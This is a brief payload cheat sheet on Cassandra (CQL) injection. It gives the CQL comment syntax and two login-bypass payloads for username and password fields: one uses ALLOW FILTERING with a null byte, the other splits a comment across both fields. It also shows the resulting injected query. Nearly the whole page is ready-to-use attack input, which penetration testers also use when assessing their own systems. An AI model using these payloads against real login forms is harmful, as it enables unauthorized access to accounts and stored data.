# Cassandra Injection > Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system ## Summary * [Cassandra comment](#cassandra-comment) * [Cassandra - Login Bypass](#cassandra---login-bypass) * [Login Bypass 0](#login-bypass-0) * [Login Bypass 1](#login-bypass-1) * [References](#references) ## Cassandra comment ```sql /* Cassandra Comment */ ``` ## Cassandra - Login Bypass ### Login Bypass 0 ```sql username: admin' ALLOW FILTERING; %00 password: ANY ``` ### Login Bypass 1 ```sql username: admin'/* password: */and pass>' ``` The injection would look like the following SQL query ```sql SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING; ``` ## References * [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/)